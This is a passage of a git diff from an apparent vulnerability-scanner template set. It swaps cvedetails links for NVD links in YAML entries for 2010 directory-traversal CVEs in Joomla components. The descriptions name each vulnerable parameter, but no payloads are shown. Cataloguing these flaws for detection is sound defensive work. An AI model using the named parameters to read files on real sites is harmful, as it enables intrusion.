Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. reference: - https://www.exploit-db.com/exploits/11498 - - https://www.cvedetails.com/cve/CVE-2010-0759 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0759 - http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/ - http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-0942.yaml b/cves/2010/CVE-2010-0942.yaml index 7da6f78f24..98ae253f0c 100644 --- a/cves/2010/CVE-2010-0942.yaml +++ b/cves/2010/CVE-2010-0942.yaml @@ -7,7 +7,7 @@ info: description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11089 - - https://www.cvedetails.com/cve/CVE-2010-0942 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0942 - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt remediation: Apply all relevant security patches and product upgrades. classification: diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml index 7e876effea..ddefa7143e 100644 --- a/cves/2010/CVE-2010-0943.yaml +++ b/cves/2010/CVE-2010-0943.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. reference: - https://www.exploit-db.com/exploits/11090 - - https://www.cvedetails.com/cve/CVE-2010-0943 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0943 - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/ - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/ classification: diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml index f4466848fc..750690dd15 100644 --- a/cves/2010/CVE-2010-0944.yaml +++ b/cves/2010/CVE-2010-0944.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11088 - - https://www.cvedetails.com/cve/CVE-2010-0944 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0944 - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - http://www.exploit-db.com/exploits/11088 remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-0972.yaml b/cves/2010/CVE-2010-0972.yaml index 8407ae95f5..97b0f6372c 100644 --- a/cves/2010/CVE-2010-0972.yaml +++ b/cves/2010/CVE-2010-0972.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11738 - - https://www.cvedetails.com/cve/CVE-2010-0972 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0972 - http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/ - http://www.exploit-db.com/exploits/11738 remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-0982.yaml b/cves/2010/CVE-2010-0982.yaml index d01504ad83..4f3003463f 100644 --- a/cves/2010/CVE-2010-0982.yaml +++ b/cves/2010/CVE-2010-0982.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10942 - - https://www.cvedetails.com/cve/CVE-2010-0982 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0982 - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ - http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/ remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-0985.yaml b/cves/2010/CVE-2010-0985.yaml index bf22a5fe1c..ebfa8dbd5a 100644 --- a/cves/2010/CVE-2010-0985.yaml +++ b/cves/2010/CVE-2010-0985.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10948 - - https://www.cvedetails.com/cve/CVE-2010-0985 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560 - http://www.exploit-db.com/exploits/10948 remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-1056.yaml b/cves/2010/CVE-2010-1056.yaml index e7acf71db9..de86ecf078 100644 --- a/cves/2010/CVE-2010-1056.yaml +++ b/cves/2010/CVE-2010-1056.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11760 - - https://www.cvedetails.com/cve/CVE-2010-1056 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1056 - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/ - http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/ remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-1081.yaml b/cves/2010/CVE-2010-1081.yaml index 846d1ba7cc..2f7528c9fd 100644 --- a/cves/2010/CVE-2010-1081.yaml +++ b/cves/2010/CVE-2010-1081.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11511 - - https://www.cvedetails.com/cve/CVE-2010-1081 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1081 - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html remediation: Apply all relevant security patches and product upgrades. classification: diff --git a/cves/2010/CVE-2010-1217.yaml b/cves/2010/CVE-2010-1217.yaml index 71b5ad9a37..82fc325e1b 100644 --- a/cves/2010/CVE-2010-1217.yaml +++ b/cves/2010/CVE-2010-1217.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. reference: - https://www.exploit-db.com/exploits/11814 - - https://www.cvedetails.com/cve/CVE-2010-1217 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1217 - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866 remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml index 7fc13086f6..cbf010acc7 100644 --- a/cves/2010/CVE-2010-1219.yaml +++ b/cves/2010/CVE-2010-1219.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11757 - - https://www.cvedetails.com/cve/CVE-2010-1219 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1219 - http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952 - http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml index 1f25c7cecb..58e97d8d0b 100644 --- a/cves/2010/CVE-2010-1302.yaml +++ b/cves/2010/CVE-2010-1302.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11978 - - https://www.cvedetails.com/cve/CVE-2010-1302 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1302 - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/ - http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml index c2e0e955f7..37332c37ad 100644 --- a/cves/2010/CVE-2010-1304.yaml +++ b/cves/2010/CVE-2010-1304.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - - https://www.cvedetails.com/cve/CVE-2010-1304 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1304 - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174 - http://www.exploit-db.com/exploits/11998 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml index 4250249b6b..8ebcd61935 100644 --- a/cves/2010/CVE-2010-1305.yaml +++ b/cves/2010/CVE-2010-1305.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12065 - - https://www.cvedetails.com/cve/CVE-2010-1305 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1305 - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 - http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml index 26928f9d4d..47c02a8976 100644 --- a/cves/2010/CVE-2010-1306.yaml +++ b/cves/2010/CVE-2010-1306.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12058 - - https://www.cvedetails.com/cve/CVE-2010-1306 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1306 - http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/ - http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml index cf39fdc2b2..e28a089576 100644 --- a/cves/2010/CVE-2010-1307.yaml +++ b/cves/2010/CVE-2010-1307.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12070 - - https://www.cvedetails.com/cve/CVE-2010-1307 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/ - http://www.vupen.com/english/advisories/2010/0806 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml index 909c451b53..85d483a144 100644 --- a/cves/2010/CVE-2010-1308.yaml +++ b/cves/2010/CVE-2010-1308.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12066 - - https://www.cvedetails.com/cve/CVE-2010-1308 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1308 - http://www.vupen.com/english/advisories/2010/0809 remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml index 059b64aa78..bacf39c17d 100644 --- a/cves/2010/CVE-2010-1312.yaml +++ b/cves/2010/CVE-2010-1312.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12077 - - https://www.cvedetails.com/cve/CVE-2010-1312 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1312 - http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/ - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml index c0d27ee8d3..8f8ff0ec2d 100644 --- a/cves/2010/CVE-2010-1313.yaml +++ b/cves/2010/CVE-2010-1313.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12082 - - https://www.cvedetails.com/cve/CVE-2010-1313 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/ - http://www.exploit-db.com/exploits/12082 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml index 3958192d98..cb775fd328 100644 --- a/cves/2010/CVE-2010-1314.yaml +++ b/cves/2010/CVE-2010-1314.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12086 - - https://www.cvedetails.com/cve/CVE-2010-1314 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1314 - http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/ - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml index de359df4af..d834feaff9 100644 --- a/cves/2010/CVE-2010-1315.yaml +++ b/cves/2010/CVE-2010-1315.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11999 - - https://www.cvedetails.com/cve/CVE-2010-1315 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1315 - http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/ - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml index e97e612947..2531ecf689 100644 --- a/cves/2010/CVE-2010-1340.yaml +++ b/cves/2010/CVE-2010-1340.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/33797 - - https://www.cvedetails.com/cve/CVE-2010-1340 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1340 - http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/ - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml index fa6ee67ced..b3ace494e6 100644 --- a/cves/2010/CVE-2010-1345.yaml +++ b/cves/2010/CVE-2010-1345.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15453 - - https://www.cvedetails.com/cve/CVE-2010-1345 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1345 - http://www.exploit-db.com/exploits/11785 remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml index af0680717a..1bf8cd597e 100644 --- a/cves/2010/CVE-2010-1352.yaml +++ b/cves/2010/CVE-2010-1352.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12084 - - https://www.cvedetails.com/cve/CVE-2010-1352 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1352 - http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/ - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml index 73fb8f0020..246320cc64 100644 --- a/cves/2010/CVE-2010-1353.yaml +++ b/cves/2010/CVE-2010-1353.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12068 - - https://www.cvedetails.com/cve/CVE-2010-1353 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1353 - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/ - http://www.vupen.com/english/advisories/2010/0808 classification: diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml index aeef172960..549722e61d 100644 --- a/cves/2010/CVE-2010-1354.yaml +++ b/cves/2010/CVE-2010-1354.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12102 - - https://www.cvedetails.com/cve/CVE-2010-1354 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1354 - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt - http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml index 0c6bf1782f..20e8bfd5da 100644 --- a/cves/2010/CVE-2010-1461.yaml +++ b/cves/2010/CVE-2010-1461.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12232 - - https://www.cvedetails.com/cve/CVE-2010-1461 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504 - http://www.exploit-db.com/exploits/12232 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml index be491b5e73..73545f121f 100644 --- a/cves/2010/CVE-2010-1469.yaml +++ b/cves/2010/CVE-2010-1469.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12146 - - https://www.cvedetails.com/cve/CVE-2010-1469 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1469 - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt - http://www.exploit-db.com/exploits/12146 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml index 1d6450b1b8..2bafc272bc 100644 --- a/cves/2010/CVE-2010-1470.yaml +++ b/cves/2010/CVE-2010-1470.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12166 - - https://www.cvedetails.com/cve/CVE-2010-1470 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1470 - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ - http://www.exploit-db.com/exploits/12166 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml index 0d9df245c0..3f69e8debf 100644 --- a/cves/2010/CVE-2010-1471.yaml +++ b/cves/2010/CVE-2010-1471.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12170 - - https://www.cvedetails.com/cve/CVE-2010-1471 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1471 - http://www.vupen.com/english/advisories/2010/0862 classification: cve-id: CVE-2010-1471 diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml index a69ad87305..944b75230e 100644 --- a/cves/2010/CVE-2010-1472.yaml +++ b/cves/2010/CVE-2010-1472.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12167 - - https://www.cvedetails.com/cve/CVE-2010-1472 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1472 - http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/ - http://www.exploit-db.com/exploits/12167 remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml index 7d81133c22..6e7a89e68a 100644 --- a/cves/2010/CVE-2010-1473.yaml +++ b/cves/2010/CVE-2010-1473.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12171 - - https://www.cvedetails.com/cve/CVE-2010-1473 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1473 - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml index ebce5060fb..089d5a7a7e 100644 --- a/cves/2010/CVE-2010-1474.yaml +++ b/cves/2010/CVE-2010-1474.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12182 - - https://www.cvedetails.com/cve/CVE-2010-1474 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/ - http://www.exploit-db.com/exploits/12182 classification: diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml index 9d5ab44333..e63b0e6511 100644 --- a/cves/2010/CVE-2010-1475.yaml +++ b/cves/2010/CVE-2010-1475.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12147 - - https://www.cvedetails.com/cve/CVE-2010-1475 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/ - http://www.exploit-db.com/exploits/12147 classification: diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml index 1ae3498a34..af4354d5ef 100644 --- a/cves/2010/CVE-2010-1476.yaml +++ b/cves/2010/CVE-2010-1476.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12150 - - https://www.cvedetails.com/cve/CVE-2010-1476 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1476 - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt - http://www.alphaplug.com/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml index 1d8de53169..d14a22ddc6 100644 --- a/cves/2010/CVE-2010-1478.yaml +++ b/cves/2010/CVE-2010-1478.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12145 - - https://www.cvedetails.com/cve/CVE-2010-1478 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1478 - http://web.archive.org/web/20140723205157/http://secunia.com/advisories/39262/ - http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml index 3640e1e37a..921f857181 100644 --- a/cves/2010/CVE-2010-1491.yaml +++ b/cves/2010/CVE-2010-1491.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12318 - - https://www.cvedetails.com/cve/CVE-2010-1491 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1491 - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - http://web.archive.org/web/20140724060325/http://secunia.com/advisories/39533/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml index d8a96ed10f..4046971415 100644 --- a/cves/2010/CVE-2010-1494.yaml +++ b/cves/2010/CVE-2010-1494.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12113 - - https://www.cvedetails.com/cve/CVE-2010-1494 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1494 - http://www.exploit-db.com/exploits/12113 remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml index 6e28f8a4fe..a3d6ece247 100644 --- a/cves/2010/CVE-2010-1495.yaml +++ b/cves/2010/CVE-2010-1495.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12286 - - https://www.cvedetails.com/cve/CVE-2010-1495 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1495 - http://www.vupen.com/english/advisories/2010/0929 - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml index 6a0cba1da4..43000a2329 100644 --- a/cves/2010/CVE-2010-1531.yaml +++ b/cves/2010/CVE-2010-1531.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12054 - - https://www.cvedetails.com/cve/CVE-2010-1531 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1531 - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt remediation: Upgrade to a supported version. classification: diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml index 3cfdb1c33b..8f12ec7519 100644 --- a/cves/2010/CVE-2010-1532.yaml +++ b/cves/2010/CVE-2010-1532.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to 